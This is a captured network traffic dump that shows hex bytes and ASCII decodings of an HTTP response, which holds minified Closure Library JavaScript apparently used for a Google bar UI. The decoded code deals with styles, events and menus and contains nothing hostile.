                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC50INData Raw: 28 64 29 2c 76 6f 69 64 20 30 21 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2e 73 74 79 6c 65 5b 64 5d 5c 75 30 30 32 36 5c 75 30 30 32 36 28 63 5c 75 30 30 33 64 64 29 29 3b 4f 67 5b 62 5d 5c 75 30 30 33 64 63 7d 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 50 67 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 61 2e 73 74 79 6c 65 5b 5f 2e 45 67 28 62 29 5d 3b 72 65 74 75 72 6e 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 21 5c 75 30 30 33 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 63 3f 63 3a 61 2e 73 74 79 6c 65 5b 4d 67 28 61 2c 62 29 5d 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 51 67 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 5f 2e 75 65 28 61 29 3b 72 65 74 75 72 6e 20 63 2e 64 65
                                                                                                                                                                                                                        Data Ascii: (d),void 0!\u003d\u003da.style[d]\u0026\u0026(c\u003dd));Og[b]\u003dc}return c};_.Pg\u003dfunction(a,b){var c\u003da.style[_.Eg(b)];return\"undefined\"!\u003d\u003dtypeof c?c:a.style[Mg(a,b)]||\"\"};\n_.Qg\u003dfunction(a,b){var c\u003d_.ue(a);return c.de
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC51INData Raw: 65 77 20 5f 2e 69 65 28 62 2c 63 29 7d 3b 5f 2e 57 67 5c 75 30 30 33 64 5f 2e 74 62 3f 5c 22 4d 6f 7a 55 73 65 72 53 65 6c 65 63 74 5c 22 3a 5f 2e 75 62 7c 7c 5f 2e 72 62 3f 5c 22 57 65 62 6b 69 74 55 73 65 72 53 65 6c 65 63 74 5c 22 3a 6e 75 6c 6c 3b 5c 6e 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 58 67 2c 5a 67 3b 58 67 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e
                                                                                                                                                                                                                        Data Ascii: ew _.ie(b,c)};_.Wg\u003d_.tb?\"MozUserSelect\":_.ub||_.rb?\"WebkitUserSelect\":null;\n\n}catch(e){_._DumpException(e)}\ntry{\n/*\n\n Copyright The Closure Library Authors.\n SPDX-License-Identifier: Apache-2.0\n*/\nvar Xg,Zg;Xg\u003dfunction(a,b){return n
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC52INData Raw: 2e 76 62 5c 75 30 30 32 36 5c 75 30 30 32 36 31 36 5c 75 30 30 33 64 5c 75 30 30 33 64 62 5c 75 30 30 32 36 5c 75 30 30 32 36 28 64 7c 7c 66 29 29 72 65 74 75 72 6e 21 31 7d 69 66 28 28 5f 2e 75 62 7c 7c 5f 2e 72 62 29 5c 75 30 30 32 36 5c 75 30 30 32 36 64 5c 75 30 30 32 36 5c 75 30 30 32 36 63 29 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 32 32 30 3a 63 61 73 65 20 32 31 39 3a 63 61 73 65 20 32 32 31 3a 63 61 73 65 20 31 39 32 3a 63 61 73 65 20 31 38 36 3a 63 61 73 65 20 31 38 39 3a 63 61 73 65 20 31 38 37 3a 63 61 73 65 20 31 38 38 3a 63 61 73 65 20 31 39 30 3a 63 61 73 65 20 31 39 31 3a 63 61 73 65 20 31 39 32 3a 63 61 73 65 20 32 32 32 3a 72 65 74 75 72 6e 21 31 7d 69 66 28 5f 2e 42 5c 75 30 30 32 36 5c 75 30 30 32 36 64 5c 75 30 30 32 36 5c 75 30
                                                                                                                                                                                                                        Data Ascii: .vb\u0026\u002616\u003d\u003db\u0026\u0026(d||f))return!1}if((_.ub||_.rb)\u0026\u0026d\u0026\u0026c)switch(a){case 220:case 219:case 221:case 192:case 186:case 189:case 187:case 188:case 190:case 191:case 192:case 222:return!1}if(_.B\u0026\u0026d\u0026\u0
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC54INData Raw: 3b 5f 2e 65 68 2e 54 2e 54 63 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 5f 2e 65 68 2e 70 72 6f 74 6f 74 79 70 65 2e 54 63 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 68 69 73 2e 41 5c 75 30 30 32 36 5c 75 30 30 32 36 74 68 69 73 2e 41 21 5c 75 30 30 33 64 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 4f 5c 22 29 3b 5f 2e 65 68 2e 54 2e 54 63 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 65 68 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 62 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 5c 75 30 30 33 64 74 68 69 73 2e 6a 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 5c 22 44 49 56 5c 22 29 7d 3b 5f 2e 65 68 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6e 64 65 72 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 68 28
                                                                                                                                                                                                                        Data Ascii: ;_.eh.T.Tc.call(a,b)};_.eh.prototype.Tc\u003dfunction(a){if(this.A\u0026\u0026this.A!\u003da)throw Error(\"O\");_.eh.T.Tc.call(this,a)};_.eh.prototype.Jb\u003dfunction(){this.o\u003dthis.j.createElement(\"DIV\")};_.eh.prototype.render\u003dfunction(a){ih(
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC55INData Raw: 5f 2e 66 68 28 61 29 3b 69 66 28 6e 75 6c 6c 21 5c 75 30 30 33 64 5c 75 30 30 33 64 64 5c 75 30 30 32 36 5c 75 30 30 32 36 65 20 69 6e 20 64 29 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 65 29 3b 64 5b 65 5d 5c 75 30 30 33 64 61 7d 68 68 28 61 2c 74 68 69 73 29 3b 5f 2e 43 67 28 74 68 69 73 2e 43 2c 62 2c 30 2c 61 29 3b 61 2e 42 61 5c 75 30 30 32 36 5c 75 30 30 32 36 74 68 69 73 2e 42 61 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 41 5c 75 30 30 33 64 5c 75 30 30 33 64 74 68 69 73 3f 28 63 5c 75 30 30 33 64 74 68 69 73 2e 55 63 28 29 2c 28 63 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 62 5d 7c 7c 6e 75 6c 6c 29 21 5c 75 30 30 33 64 61 2e 48 28 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 61 2e 48 28 29 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 5c 75 30
                                                                                                                                                                                                                        Data Ascii: _.fh(a);if(null!\u003d\u003dd\u0026\u0026e in d)throw Error(\"B`\"+e);d[e]\u003da}hh(a,this);_.Cg(this.C,b,0,a);a.Ba\u0026\u0026this.Ba\u0026\u0026a.A\u003d\u003dthis?(c\u003dthis.Uc(),(c.childNodes[b]||null)!\u003da.H()\u0026\u0026(a.H().parentElement\u0
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC56INData Raw: 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 5f 2e 6f 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 5f 2e 6e 68 2e 6c 69 73 74 65 6e 28 62 2c 63 2c 76 6f 69 64 20 30 2c 61 2e 55 7c 7c 61 2c 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 70 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 63 3f 62 3a 5f 2e 50 63 28 62 29 3b 61 2e 68 72 65 66 5c 75 30 30 33 64 5f 2e 4a 63 28 62 29 7d 3b 5f 2e 71 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63
                                                                                                                                                                                                                        Data Ascii: ight The Closure Library Authors.\n SPDX-License-Identifier: Apache-2.0\n*/\n_.oh\u003dfunction(a,b,c){_.nh.listen(b,c,void 0,a.U||a,a);return a};_.ph\u003dfunction(a,b){b\u003db instanceof _.Ic?b:_.Pc(b);a.href\u003d_.Jc(b)};_.qh\u003dfunction(a,b){var c
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC58INData Raw: 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 66 6f 72 28 76 61 72 20 66 2c 67 5c 75 30 30 33 64 30 3b 66 5c 75 30 30 33 64 75 68 5b 67 5d 3b 67 2b 2b 29 7b 76 61 72 20 6b 5c 75 30 30 33 64 61 3b 76 61 72 20 6c 5c 75 30 30 33 64 66 3b 76 61 72 20 6d 5c 75 30 30 33 64 21 21 63 3b 6c 5c 75 30 30 33 64 5f 2e 4e 65 28 6b 29 3f 6b 2e 74 65 28 6c 2c 6d 29 3a 6b 3f 28 6b 5c 75 30 30 33 64 5f 2e 24 65 28 6b 29 29 3f 6b 2e 74 65 28 6c 2c 6d 29 3a 5b 5d 3a 5b 5d 3b 66 6f 72 28 6b 5c 75 30 30 33 64 30 3b 6d 5c 75 30 30 33 64 6c 5b 6b 5d 3b 6b 2b 2b 29 7b 76 61 72 20 72 5c 75 30 30 33 64 6d 2e 6c 69 73 74 65 6e 65 72 3b 69 66 28 72 2e 4e 62 5c 75 30 30 33 64 5c 75 30 30 33 64 62 5c 75 30 30 32 36 5c 75 30 30 32 36 72 2e 42 6b 5c 75 30 30 33 64 5c 75 30 30 33 64 64 29 7b 65
                                                                                                                                                                                                                        Data Ascii: n(a,b,c,d,e){for(var f,g\u003d0;f\u003duh[g];g++){var k\u003da;var l\u003df;var m\u003d!!c;l\u003d_.Ne(k)?k.te(l,m):k?(k\u003d_.$e(k))?k.te(l,m):[]:[];for(k\u003d0;m\u003dl[k];k++){var r\u003dm.listener;if(r.Nb\u003d\u003db\u0026\u0026r.Bk\u003d\u003dd){e
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC59INData Raw: 2c 64 2c 65 2c 66 29 3b 5f 2e 7a 68 28 62 2c 63 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 7a 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 78 68 28 5f 2e 77 68 28 5c 22 65 71 5c 22 29 2c 61 2c 62 7c 7c 5b 5d 29 29 29 69 66 28 5f 2e 42 5c 75 30 30 32 36 5c 75 30 30 32 36 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 4d 6f 75 73 65 45 76 65 6e 74 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 29 7b 76 61 72 20 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 5c 22 4d 6f 75 73 65 45 76 65 6e 74 5c 22 29 3b 63 2e 69 6e 69 74 4d 6f 75 73 65 45 76 65 6e 74
                                                                                                                                                                                                                        Data Ascii: ,d,e,f);_.zh(b,c);return a};_.zh\u003dfunction(a,b){if(a instanceof Element\u0026\u0026(b\u003dxh(_.wh(\"eq\"),a,b||[])))if(_.B\u0026\u0026b instanceof MouseEvent\u0026\u0026a.dispatchEvent){var c\u003ddocument.createEvent(\"MouseEvent\");c.initMouseEvent
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC60INData Raw: 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 20 5f 2e 68 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 62 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 62 2c 63 2c 64 29 7d 3b 5c 6e 76 61 72 20 43 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 5f 2e 6d 62 28 61 2c 43 68 29 3a 5c 22 73 74 72 69 6e 67 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 61 3f 61 3a 61 3f 61 2e 74 6f 53 74 72 69 6e 67 28 29 3a 61 7d 3b 5c 6e 5f 2e 44 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 42 68 2e 63 61 6c 6c 28 74 68 69 73 2c 62 29 3b 74 68 69 73 2e 6f 5c 75 30 30 33 64 61 7d 3b 5f 2e 75 28 5f 2e 44 68 2c 5f 2e 42 68 29 3b 5f 2e 44 68 2e 70 72 6f 74
                                                                                                                                                                                                                        Data Ascii: return c}return _.hf.prototype.ob.call(this,a,b,c,d)};\nvar Ch\u003dfunction(a){return Array.isArray(a)?_.mb(a,Ch):\"string\"\u003d\u003d\u003dtypeof a?a:a?a.toString():a};\n_.Dh\u003dfunction(a,b){_.Bh.call(this,b);this.o\u003da};_.u(_.Dh,_.Bh);_.Dh.prot
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC61INData Raw: 2e 4b 68 28 61 2c 62 2c 63 2c 21 31 29 3b 72 65 74 75 72 6e 20 63 7d 3b 4c 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 5c 75 30 30 33 64 61 2e 74 61 62 49 6e 64 65 78 3b 72 65 74 75 72 6e 5c 22 6e 75 6d 62 65 72 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 61 5c 75 30 30 32 36 5c 75 30 30 32 36 30 5c 75 30 30 33 63 5c 75 30 30 33 64 61 5c 75 30 30 32 36 5c 75 30 30 32 36 33 32 37 36 38 5c 75 30 30 33 65 61 7d 3b 5c 6e 5f 2e 49 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 28 62 5c 75 30 30 33 64 5c 22 41 5c 22 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2e 74 61 67 4e 61 6d 65 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 5c 22 68 72 65
                                                                                                                                                                                                                        Data Ascii: .Kh(a,b,c,!1);return c};Lh\u003dfunction(a){a\u003da.tabIndex;return\"number\"\u003d\u003d\u003dtypeof a\u0026\u00260\u003c\u003da\u0026\u002632768\u003ea};\n_.Ih\u003dfunction(a){var b;if((b\u003d\"A\"\u003d\u003da.tagName\u0026\u0026a.hasAttribute(\"hre
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC63INData Raw: 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4b 2e 63 61 6c 6c 28 74 68 69 73 29 3b 74 68 69 73 2e 43 5c 75 30 30 33 64 61 3b 74 68 69 73 2e 41 5c 75 30 30 33 64 6e 75 6c 6c 3b 74 68 69 73 2e 6f 5c 75 30 30 33 64 7b 7d 3b 74 68 69 73 2e 44 5c 75 30 30 33 64 7b 7d 3b 74 68 69 73 2e 6a 5c 75 30 30 33 64 7b 7d 3b 74 68 69 73 2e 42 5c 75 30 30 33 64 6e 75 6c 6c 7d 3b 5f 2e 75 28 4e 68 2c 5f 2e 4b 29 3b 5f 2e 4f 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 41 29 72 65 74 75 72 6e 20 0d 0a
                                                                                                                                                                                                                        Data Ascii: u003dfunction(a){_.K.call(this);this.C\u003da;this.A\u003dnull;this.o\u003d{};this.D\u003d{};this.j\u003d{};this.B\u003dnull};_.u(Nh,_.K);_.Oh\u003dfunction(a){if(a.A)return
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC63INData Raw: 37 35 35 35 0d 0a 61 2e 41 3b 66 6f 72 28 76 61 72 20 62 20 69 6e 20 61 2e 6a 29 69 66 28 61 2e 6a 5b 62 5d 2e 6c 66 28 29 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 6a 5b 62 5d 2e 54 62 28 29 29 72 65 74 75 72 6e 20 61 2e 6a 5b 62 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 5f 2e 68 5c 75 30 30 33 64 4e 68 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 68 2e 46 66 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 4f 68 28 74 68 69 73 29 5c 75 30 30 32 36 5c 75 30 30 32 36 61 21 5c 75 30 30 33 64 5f 2e 4f 68 28 74 68 69 73 29 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 4f 68 28 74 68 69 73 29 2e 61 65 28 21 31 29 3b 74 68 69 73 2e 41 5c 75 30 30 33 64 61 7d 3b 5f 2e 68 2e 4b 67 5c 75 30 30 33 64 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                        Data Ascii: 7555a.A;for(var b in a.j)if(a.j[b].lf()\u0026\u0026a.j[b].Tb())return a.j[b];return null};_.h\u003dNh.prototype;_.h.Ff\u003dfunction(a){a\u0026\u0026_.Oh(this)\u0026\u0026a!\u003d_.Oh(this)\u0026\u0026_.Oh(this).ae(!1);this.A\u003da};_.h.Kg\u003dfunctio
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC64INData Raw: 67 62 61 72 2e 4a 5c 22 2c 5f 2e 53 68 29 3b 5f 2e 53 68 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 61 5c 75 30 30 33 64 5f 2e 53 68 2e 70 72 6f 74 6f 74 79 70 65 2e 57 3b 5f 2e 53 68 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 62 5c 75 30 30 33 64 5f 2e 53 68 2e 70 72 6f 74 6f 74 79 70 65 2e 58 3b 5f 2e 7a 28 5c 22 67 62 61 72 2e 4b 5c 22 2c 5f 2e 54 68 29 3b 5f 2e 7a 28 5c 22 67 62 61 72 2e 4c 5c 22 2c 5f 2e 55 68 29 3b 5f 2e 55 68 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 61 5c 75 30 30 33 64 5f 2e 55 68 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 7d 3b 5c 6e 57 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 2e 78 61 5c 75 30 30 33 64 62 2e 74 79 70 65 3b 62 2e 78 62 5c 75 30 30 33 64 62 2e 74 61 72 67 65 74 3b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 74 68 69
                                                                                                                                                                                                                        Data Ascii: gbar.J\",_.Sh);_.Sh.prototype.ja\u003d_.Sh.prototype.W;_.Sh.prototype.jb\u003d_.Sh.prototype.X;_.z(\"gbar.K\",_.Th);_.z(\"gbar.L\",_.Uh);_.Uh.prototype.la\u003d_.Uh.prototype.o};\nWh\u003dfunction(a,b){b.xa\u003db.type;b.xb\u003db.target;return a.call(thi
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC65INData Raw: 65 20 74 68 69 73 2e 4e 62 3b 64 65 6c 65 74 65 20 74 68 69 73 2e 6a 7d 3b 5f 2e 68 2e 73 74 61 72 74 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 73 74 6f 70 28 29 3b 74 68 69 73 2e 56 63 5c 75 30 30 33 64 5f 2e 79 67 28 74 68 69 73 2e 6c 62 2c 76 6f 69 64 20 30 21 5c 75 30 30 33 64 5c 75 30 30 33 64 61 3f 61 3a 74 68 69 73 2e 6f 29 7d 3b 5f 2e 68 2e 73 74 6f 70 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 30 21 5c 75 30 30 33 64 74 68 69 73 2e 56 63 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 7a 67 28 74 68 69 73 2e 56 63 29 3b 74 68 69 73 2e 56 63 5c 75 30 30 33 64 30 7d 3b 5f 2e 68 2e 79 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 56 63 5c 75 30 30 33 64 30 3b 74 68 69 73 2e 4e 62 5c 75 30 30 32 36
                                                                                                                                                                                                                        Data Ascii: e this.Nb;delete this.j};_.h.start\u003dfunction(a){this.stop();this.Vc\u003d_.yg(this.lb,void 0!\u003d\u003da?a:this.o)};_.h.stop\u003dfunction(){0!\u003dthis.Vc\u0026\u0026_.zg(this.Vc);this.Vc\u003d0};_.h.yh\u003dfunction(){this.Vc\u003d0;this.Nb\u0026
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC67INData Raw: 69 6e 20 61 2e 64 61 74 61 73 65 74 3a 61 2e 68 61 73 41 74 74 72 69 62 75 74 65 3f 61 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 5c 22 64 61 74 61 2d 5c 22 2b 61 69 28 62 29 29 3a 21 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 64 61 74 61 2d 5c 22 2b 61 69 28 62 29 29 7d 3b 5f 2e 69 69 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6a 5c 75 30 30 33 64 61 3b 74 68 69 73 2e 6f 5c 75 30 30 33 64 6e 75 6c 6c 7d 3b 5f 2e 6a 69 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 6f 7c 7c 28 61 2e 6f 5c 75 30 30 33 64 5f 2e 51 28 61 2e 6a 2c 5c 22 6b 65 79 64 6f 77 6e 5c 22 2c 61 2e 41 2c 21 31 2c 61 29 29 7d 3b 5f 2e 6c 69 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6b 69 28 61 29 3b 5f 2e 55 28 61 2e 6a 2c 5c
                                                                                                                                                                                                                        Data Ascii: in a.dataset:a.hasAttribute?a.hasAttribute(\"data-\"+ai(b)):!!a.getAttribute(\"data-\"+ai(b))};_.ii\u003dfunction(a){this.j\u003da;this.o\u003dnull};_.ji\u003dfunction(a){a.o||(a.o\u003d_.Q(a.j,\"keydown\",a.A,!1,a))};_.li\u003dfunction(a){ki(a);_.U(a.j,\
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC68INData Raw: 6f 74 6f 74 79 70 65 3b 5c 6e 5f 2e 68 2e 6f 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3f 5f 2e 66 69 28 74 68 69 73 2e 48 28 29 2c 5c 22 69 74 65 6d 5c 22 2c 61 29 3a 28 61 5c 75 30 30 33 64 74 68 69 73 2e 48 28 29 2c 21 2f 2d 5b 61 2d 7a 5d 2f 2e 74 65 73 74 28 5c 22 69 74 65 6d 5c 22 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 5f 2e 6d 68 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 64 61 74 61 73 65 74 3f 68 69 28 61 2c 5c 22 69 74 65 6d 5c 22 29 5c 75 30 30 32 36 5c 75 30 30 32 36 64 65 6c 65 74 65 20 61 2e 64 61 74 61 73 65 74 2e 69 74 65 6d 3a 61 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 5c 22 64 61 74 61 2d 5c 22 2b 61 69 28 5c 22 69 74 65 6d 5c 22 29 29 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 76 64 5c 75
                                                                                                                                                                                                                        Data Ascii: ototype;\n_.h.oh\u003dfunction(a){a?_.fi(this.H(),\"item\",a):(a\u003dthis.H(),!/-[a-z]/.test(\"item\")\u0026\u0026(_.mh\u0026\u0026a.dataset?hi(a,\"item\")\u0026\u0026delete a.dataset.item:a.removeAttribute(\"data-\"+ai(\"item\"))));return this};_.h.vd\u
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC69INData Raw: 43 61 73 65 28 29 29 29 72 65 74 75 72 6e 20 74 68 69 73 3b 74 68 69 73 2e 42 3f 28 63 69 28 61 2c 74 68 69 73 2e 42 29 2c 74 68 69 73 2e 42 5c 75 30 30 33 64 6e 75 6c 6c 29 3a 74 68 69 73 2e 6a 3f 63 69 28 61 2c 74 68 69 73 2e 6a 29 3a 5f 2e 58 68 28 61 2c 74 68 69 73 2e 6f 29 3b 76 61 72 20 62 5c 75 30 30 33 64 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 63 6c 61 73 73 5c 22 29 3b 62 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 63 6c 61 73 73 5c 22 2c 62 2b 5c 22 20 67 62 5f 53 63 5c 22 29 3a 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 63 6c 61 73 73 5c 22 2c 5c 22 67 62 5f 53 63 5c 22 29 3b 74 68 69 73 2e 6a 5c 75 30 30 33 64 61 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 66 6f 63 75 73 5c 75 30 30 33 64 66 75 6e 63 74
                                                                                                                                                                                                                        Data Ascii: Case()))return this;this.B?(ci(a,this.B),this.B\u003dnull):this.j?ci(a,this.j):_.Xh(a,this.o);var b\u003da.getAttribute(\"class\");b?a.setAttribute(\"class\",b+\" gb_Sc\"):a.setAttribute(\"class\",\"gb_Sc\");this.j\u003da;return this};_.h.focus\u003dfunct
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC70INData Raw: 68 69 73 2e 6a 5c 75 30 30 33 64 5f 2e 4d 28 5c 22 67 62 5f 50 63 5c 22 2c 74 68 69 73 2e 48 28 29 29 7d 3b 5f 2e 75 28 74 69 2c 5f 2e 53 68 29 3b 5f 2e 68 5c 75 30 30 33 64 74 69 2e 70 72 6f 74 6f 74 79 70 65 3b 5c 6e 5f 2e 68 2e 52 62 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 53 68 2e 70 72 6f 74 6f 74 79 70 65 2e 52 62 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 3b 76 61 72 20 62 5c 75 30 30 33 64 74 68 69 73 2e 6f 2c 63 5c 75 30 30 33 64 61 2e 48 28 29 3b 63 5c 75 30 30 33 64 63 2e 69 64 7c 7c 28 63 2e 69 64 5c 75 30 30 33 64 5c 22 67 62 6d 5c 22 2b 5f 2e 63 68 28 5f 2e 62 68 2e 6a 28 29 29 29 3b 62 2e 4e 5b 63 5d 5c 75 30 30 33 64 61 7d 3b 5f 2e 68 2e 75 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                                        Data Ascii: his.j\u003d_.M(\"gb_Pc\",this.H())};_.u(ti,_.Sh);_.h\u003dti.prototype;\n_.h.Rb\u003dfunction(a){_.Sh.prototype.Rb.call(this,a);var b\u003dthis.o,c\u003da.H();c\u003dc.id||(c.id\u003d\"gbm\"+_.ch(_.bh.j()));b.N[c]\u003da};_.h.uh\u003dfunction(){return nul
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC72INData Raw: 6f 74 79 70 65 2e 52 2e 63 61 6c 6c 28 74 68 69 73 29 3b 79 69 28 74 68 69 73 29 7d 3b 5f 2e 68 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 41 7d 3b 5f 2e 68 2e 77 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 4d 28 5c 22 67 62 5f 65 65 5c 22 2c 74 68 69 73 2e 6a 29 7d 3b 5f 2e 68 2e 5a 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 7a 69 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 41 69 28 74 68 69 73 2c 74 68 69 73 2e 44 29 7d 3b 5f 2e 68 2e 59 68 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 7a 69 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 41 69 28 74 68 69 73 2c 74 68 69 73 2e 4a 29 7d 3b 5c 6e 76 61 72 20 41 69 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 